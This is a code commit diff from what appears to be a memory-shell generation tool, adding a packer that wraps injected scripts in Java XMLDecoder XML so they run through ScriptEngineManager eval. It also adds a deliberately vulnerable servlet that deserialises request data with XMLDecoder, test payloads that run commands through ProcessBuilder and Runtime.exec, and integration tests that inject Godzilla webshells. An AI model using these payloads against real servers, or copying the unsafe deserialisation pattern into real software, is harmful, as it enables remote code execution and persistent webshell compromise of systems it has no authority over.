feat: support XMLDecoder packer

ReaJason · ReaJason · commit 9fccb404bfa0 · 2025-07-22T02:05:42.000+08:00
diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java b/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java
@@ -346,6 +346,7 @@ public static void assertInjectIsOk(String url, String shellType, ShellTool shel
             case JavaCommonsCollections4 -> VulTool.postData(url + "/java_deserialize/cc40", content);
             case HessianDeserialize -> VulTool.postData(url + "/hessian", content);
             case Hessian2Deserialize -> VulTool.postData(url + "/hessian2", content);
+            case XMLDecoder ->  VulTool.postData(url + "/xmlDecoder", content);
             case Base64 -> VulTool.postData(url + "/b64", content);
             case XxlJob -> VulTool.xxlJobExecutor(url + "/run", content);
             case H2, H2JS, H2Javac -> VulTool.postData(url + "/jdbc", content);
diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8DeserializeContainerTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8DeserializeContainerTest.java
@@ -50,7 +50,8 @@ static Stream<Arguments> casesProvider() {
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsCollections3),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsCollections4),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.HessianDeserialize),
-                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Hessian2Deserialize)
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Hessian2Deserialize),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.XMLDecoder)
         );
     }
 
diff --git a/packer/src/main/java/com/reajason/javaweb/packer/Packers.java b/packer/src/main/java/com/reajason/javaweb/packer/Packers.java
@@ -41,6 +41,7 @@
 import com.reajason.javaweb.packer.spel.SpELSpringIOUtilsGzipPacker;
 import com.reajason.javaweb.packer.spel.SpELSpringUtilsPacker;
 import com.reajason.javaweb.packer.velocity.VelocityPacker;
+import com.reajason.javaweb.packer.xmldecoder.XMLDecoderPacker;
 import lombok.Getter;
 
 import java.util.List;
@@ -110,6 +111,7 @@ public enum Packers {
     Freemarker(new FreemarkerPacker()),
     Velocity(new VelocityPacker()),
     JinJava(new JinJavaPacker()),
+    XMLDecoder(new XMLDecoderPacker()),
 
     /**
      * Java 反序列化打包器
diff --git a/packer/src/main/java/com/reajason/javaweb/packer/xmldecoder/XMLDecoderPacker.java b/packer/src/main/java/com/reajason/javaweb/packer/xmldecoder/XMLDecoderPacker.java
@@ -0,0 +1,28 @@
+package com.reajason.javaweb.packer.xmldecoder;
+
+import com.reajason.javaweb.packer.ClassPackerConfig;
+import com.reajason.javaweb.packer.Packer;
+import com.reajason.javaweb.packer.Packers;
+
+/**
+ * @author ReaJason
+ * @since 2025/7/22
+ */
+public class XMLDecoderPacker implements Packer {
+    String template = "<java>\n" +
+            "    <object class=\"javax.script.ScriptEngineManager\">\n" +
+            "        <void method=\"getEngineByName\">\n" +
+            "            <string>js</string>\n" +
+            "            <void method=\"eval\">\n" +
+            "                <string>{{script}}</string>\n" +
+            "            </void>\n" +
+            "        </void>\n" +
+            "    </object>\n" +
+            "</java>";
+
+    @Override
+    public String pack(ClassPackerConfig config) {
+        String script = Packers.ScriptEngine.getInstance().pack(config);
+        return template.replace("{{script}}", script);
+    }
+}
diff --git a/vul/vul-webapp-deserialize/src/main/java/XmlDecoderServlet.java b/vul/vul-webapp-deserialize/src/main/java/XmlDecoderServlet.java
@@ -0,0 +1,25 @@
+import javax.servlet.ServletException;
+import javax.servlet.annotation.WebServlet;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.beans.XMLDecoder;
+import java.io.ByteArrayInputStream;
+import java.io.IOException;
+
+/**
+ * @author ReaJason
+ * @since 2025/7/3
+ */
+@WebServlet("/xmlDecoder")
+public class XmlDecoderServlet extends HttpServlet {
+    @Override
+    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
+        String param = req.getParameter("data");
+        ByteArrayInputStream inputStream = new ByteArrayInputStream(param.getBytes());
+        XMLDecoder xmlDecoder = new XMLDecoder(inputStream);
+        Object obj = xmlDecoder.readObject();
+        resp.getWriter().println(obj);
+        xmlDecoder.close();
+    }
+}
diff --git a/vul/vul-webapp-deserialize/src/test/java/XmlDecoderServletTest.java b/vul/vul-webapp-deserialize/src/test/java/XmlDecoderServletTest.java
@@ -0,0 +1,45 @@
+import org.junit.jupiter.api.Test;
+
+import java.beans.XMLDecoder;
+import java.io.ByteArrayInputStream;
+import java.util.Base64;
+
+/**
+ * @author ReaJason
+ * @since 2025/7/3
+ */
+class XmlDecoderServletTest {
+
+    @Test
+    void test() {
+        String xml = "<java>" +
+                "    <object class=\"java.lang.ProcessBuilder\">\n" +
+                "        <array class=\"java.lang.String\" length=\"1\" >\n" +
+                "            <void index=\"0\">\n" +
+                "                <string>Calculator</string>\n" +
+                "            </void>\n" +
+                "        </array>\n" +
+                "        <void method=\"start\"/>\n" +
+                "    </object>\n" +
+                "</java>";
+        String xml1 = "<java>" +
+                "    <object class=\"javax.script.ScriptEngineManager\">\n" +
+                "        <void method=\"getEngineByName\">\n" +
+                "            <string>js</string>\n" +
+                "            <void method=\"eval\">\n" +
+                "                <string>java.lang.Runtime.getRuntime().exec('open -a Calculator')</string>\n" +
+                "            </void>\n" +
+                "        </void>\n" +
+                "    </object>\n" +
+                "</java>";
+        try {
+            ByteArrayInputStream inputStream = new ByteArrayInputStream(xml1.getBytes());
+            XMLDecoder xmlDecoder = new XMLDecoder(inputStream);
+            xmlDecoder.readObject();
+            xmlDecoder.close();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+}
diff --git a/web/src/i18n/en.json b/web/src/i18n/en.json
@@ -56,6 +56,7 @@
   "packageConfig.packer.AgentJarWithJDKAttacher": "AgentJarWithJDKAttacher",
   "packageConfig.packer.AgentJarWithJREAttacher": "AgentJarWithJREAttacher",
   "packageConfig.packer.H2": "H2 JDBC",
+  "packageConfig.packer.XMLDecoder": "XMLDecoder",
   "packageConfig.title": "Package Method",
   "placeholders.input": "Please input",
   "placeholders.select": "Please select",

Original file line number	Diff line number	Diff line change
`@@ -50,7 +50,8 @@ static Stream<Arguments> casesProvider() {`
`50`	`50`	`arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsCollections3),`
`51`	`51`	`arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsCollections4),`
`52`	`52`	`arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.HessianDeserialize),`
`53`		`- arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Hessian2Deserialize)`
	`53`	`+ arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Hessian2Deserialize),`
	`54`	`+ arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.XMLDecoder)`
`54`	`55`	`);`
`55`	`56`	`}`
`56`	`57`